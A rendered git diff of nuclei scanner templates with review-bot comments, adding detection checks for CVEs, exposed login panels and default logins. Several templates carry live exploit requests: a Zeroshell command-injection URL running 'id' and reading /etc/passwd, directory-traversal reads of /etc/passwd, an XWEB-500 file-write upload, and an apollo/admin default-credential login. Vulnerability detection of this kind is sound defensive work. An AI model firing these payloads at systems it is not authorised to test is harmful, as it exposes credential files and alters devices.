Merge branch 'projectdiscovery:master' into dashboard
commit
0f3ffc7e0a
|
@ -1,15 +1,21 @@
|
|||
cves/2017/CVE-2017-9833.yaml
|
||||
cves/2020/CVE-2020-13158.yaml
|
||||
cves/2020/CVE-2020-15050.yaml
|
||||
cves/2020/CVE-2020-7943.yaml
|
||||
cves/2021/CVE-2021-3002.yaml
|
||||
cves/2022/CVE-2022-0381.yaml
|
||||
cves/2022/CVE-2022-23779.yaml
|
||||
cves/2022/CVE-2022-24990.yaml
|
||||
default-logins/apollo/apollo-default-login.yaml
|
||||
default-logins/digitalrebar/digitalrebar-default-login.yaml
|
||||
dns/caa-fingerprint.yaml
|
||||
exposed-panels/kentico-login.yaml
|
||||
exposed-panels/laravel-filemanager.yaml
|
||||
exposed-panels/matomo-login-portal.yaml
|
||||
exposed-panels/puppetboard-panel.yaml
|
||||
exposed-panels/xweb500-panel.yaml
|
||||
technologies/puppetdb-detect.yaml
|
||||
technologies/puppetserver-detect.yaml
|
||||
vulnerabilities/other/dixell-xweb500-filewrite.yaml
|
||||
vulnerabilities/other/laravel-filemanager-lfi.yaml
|
||||
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-12725
|
|||
|
||||
info:
|
||||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
author: dwisiswant0
|
||||
author: dwisiswant0,akincibor
|
||||
severity: critical
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
|
||||
|
@ -20,14 +20,17 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/02/04
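Review bot: The first regex, `((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+`, needs at least two alphanumeric characters directly after the `=`, so as rendered here it cannot match `uid=0(root)`, which is what `id` prints when the command runs as root. If the escaped parentheses were not simply lost in rendering, the pattern inside the double-quoted scalar should be `((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)`. Without that, the first path is unlikely to match on a root-run service and the template depends on the second path alone. Both paths are also always sent; `stop-at-first-match: true` on the request would skip the second probe once the first has confirmed the finding.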
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-13158
|
||||
info:
|
||||
name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
|
||||
reference:
|
||||
- https://github.com/InfoSec4Fun/CVE-2020-13158
|
||||
- https://sourceforge.net/projects/artica-squid/files/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-13158
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-13158
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,artica,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -3,12 +3,17 @@ id: CVE-2021-3654
|
|||
info:
|
||||
name: noVNC Open Redirect
|
||||
author: geeknik
|
||||
severity: low
|
||||
severity: medium
|
||||
description: A user-controlled input redirects noVNC users to an external website.
|
||||
reference:
|
||||
- https://seclists.org/oss-sec/2021/q3/188
|
||||
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
|
||||
tags: redirect,novnc,cve,cve2021
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-3654
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- method: GET
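Review bot: `cvss-score: 6.10` is an unquoted float, so a YAML loader reads it as 6.1 and the trailing zero is lost on any round trip; write `cvss-score: 6.1`. The page shows two `severity` lines (`low` and `medium`). Presumably one is the removed line, but if both survive in the file most parsers silently take the last one, so confirm only `severity: medium` remains. The `requests:` block continues outside the hunk.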
|
||||
|
|
|
@ -0,0 +1,46 @@
|
|||
id: apollo-default-login
|
||||
|
||||
info:
|
||||
name: Apollo Default Login
|
||||
author: PaperPen
|
||||
severity: high
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:11794165
|
||||
reference: https://github.com/apolloconfig/apollo
|
||||
tags: apollo,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /signin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}/signin?
|
||||
|
||||
username={{user}}&password={{pass}}&login-submit=Login
|
||||
|
||||
- |
|
||||
GET /user HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
user:
|
||||
- apollo
|
||||
pass:
|
||||
- admin
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- '"userId":'
|
||||
- '"email":'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
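Review bot: No `matchers-condition` is set, so the two matchers are combined with the default `or`, and the `status: 200` matcher alone reports a default login on any host that answers 200. Add `matchers-condition: and` above `matchers:`. Because `req-condition: true` is on, it would also be clearer to pin the status to the second response with a dsl matcher such as `status_code_2 == 200`, so a 200 on the `/signin` POST after a failed login cannot satisfy it.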
|
|
@ -2,7 +2,7 @@ id: axigen-webmail
|
|||
|
||||
info:
|
||||
name: Axigen WebMail
|
||||
author: dhiyaneshDk
|
||||
author: dhiyaneshDk,idealphase
|
||||
severity: info
|
||||
description: This template determines if Axigen Webmail is running.
|
||||
reference:
|
||||
|
@ -18,12 +18,19 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Axigen WebMail</title>'
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?i)(Axigen WebMail)'
|
||||
- '<title>Axigen Standard Webmail - (.*)</title>'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/25
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
part: body
|
||||
regex:
|
||||
- '<script type="text\/javascript" src="js\/lib_login\.js\?v=(.+)"><\/script>'
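Review bot: The extractor pattern ends in a greedy `v=(.+)"><\/script>`, so when several script tags share a line the captured group runs to the last `"></script>` on that line instead of stopping at the closing quote. Using `v=([^"]+)"` keeps group 1 to the version string. The `(?i)(Axigen WebMail)` regex also matches the phrase anywhere in the body, which is broader than the title match shown above it; if that is intended, a one-line comment saying so would help.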
|
||||
|
|
|
@ -2,7 +2,7 @@ id: kibana-panel
|
|||
|
||||
info:
|
||||
name: Kibana Panel Login
|
||||
author: petruknisme,daffainfo
|
||||
author: petruknisme,daffainfo,c-sh0
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"Kibana"
|
||||
|
@ -11,16 +11,24 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/login"
|
||||
- "{{BaseURL}}/app/kibana"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Kibana</title>"
|
||||
- "<title>Elastic</title>"
|
||||
- "<title>Kibana Login</title>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
- type: regex
|
||||
part: header
|
||||
words:
|
||||
- "Kbn-Name:"
|
||||
regex:
|
||||
- '(?i)(Kbn-Name)'
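Review bot: With `matchers-condition: or`, the body matcher alone decides the result, and `<title>Elastic</title>` is generic enough that other Elastic web UIs could be reported as a Kibana panel; the `Kbn-Name` header check is the more specific signal. Consider dropping the generic title or pairing it with a second Kibana-specific string in the same response. `redirects: true` also follows redirects to other hosts, so a match may describe a host other than the target; `host-redirects: true` restricts this where the nuclei version in use supports it. The rendered hunk shows both a `type: word` and a `type: regex` header matcher, presumably the old and new sides.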
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: laravel-filemanager
|
||||
|
||||
info:
|
||||
name: Laravel FileManager Panel Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
reference: https://github.com/UniSharp/laravel-filemanager
|
||||
tags: laravel,filemanager,fileupload
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/laravel-filemanager?type=Files"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Laravel FileManager"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
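Review bot: The `tags` line has no `panel` tag, although the commit's file list places this template under `exposed-panels/` and the Xweb500 panel template added in the same commit uses `tags: panel,xweb500`. Scans that select panels by tag would skip it. `tags: panel,laravel,filemanager,fileupload` would keep it consistent.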
|
|
@ -0,0 +1,25 @@
|
|||
id: xweb500-panel
|
||||
|
||||
info:
|
||||
name: Xweb500 Login Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
google-dork: inurl:"xweb500.cgi"
|
||||
tags: panel,xweb500
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/xweb500.cgi"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Xweb500</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -21,10 +21,15 @@ requests:
|
|||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
part: header
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'len(body) > 2'
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(body), '<html')"
|
||||
- "!contains(tolower(body), '<body')"
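Review bot: The last `dsl` matcher lists two expressions without a `condition`, and a matcher's entries are combined with `or` by default, so a body that contains `<body` but no `<html` (or the reverse) still passes the not-HTML check. Add `condition: and` under that matcher so both tags must be absent. This assumes no `condition` line follows outside the hunk; the enclosing `matchers` list starts above it.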
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: dixell-xweb500-filewrite
|
||||
|
||||
info:
|
||||
name: Dixell XWEB-500 - Arbitrary File Write
|
||||
author: hackerarpan
|
||||
severity: critical
|
||||
reference: https://www.exploit-db.com/exploits/50639
|
||||
metadata:
|
||||
google-dork: inurl:"xweb500.cgi"
|
||||
tags: lfw,iot,dixell,xweb500
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
{{randstr}}.txt
|
||||
dixell-xweb500-filewrite
|
||||
|
||||
- |
|
||||
GET /logo/{{randstr}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "dixell-xweb500-filewrite")'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
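Review bot: This template writes a file under `/logo/` on the target and never removes it, but `tags: lfw,iot,dixell,xweb500` does not mark it as state-changing. Adding `intrusive` to the tags lets operators exclude it from scans of production devices, and a `description` noting that a `{{randstr}}.txt` file is left behind tells them what to clean up. With `req-condition: true`, the plain `status: 200` matcher is not tied to the second response; adding `status_code_2 == 200` to the existing dsl matcher would make that explicit.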
|
|
@ -0,0 +1,28 @@
|
|||
id: laravel-filemanager-lfi
|
||||
info:
|
||||
name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
|
||||
author: hackerarpan
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48166
|
||||
- https://github.com/UniSharp/laravel-filemanager
|
||||
metadata:
|
||||
google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
|
||||
shodan-query: http.html:"Laravel FileManager"
|
||||
tags: lfi,unisharp,laravel,filemanager,fileupload,lfr
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
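Review bot: The matcher regex `root:.*:0:0` is looser than the `root:[x*]:0:0` used by the CVE-2020-13158 template added in this same commit, and matches any line that has `root:` followed later by `:0:0`. Using `root:[x*]:0:0` here keeps the two passwd checks consistent and reduces false positives. The `info` block also has no `description`, unlike the CVE templates shown in this commit; one sentence naming the `working_dir` parameter would do.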
|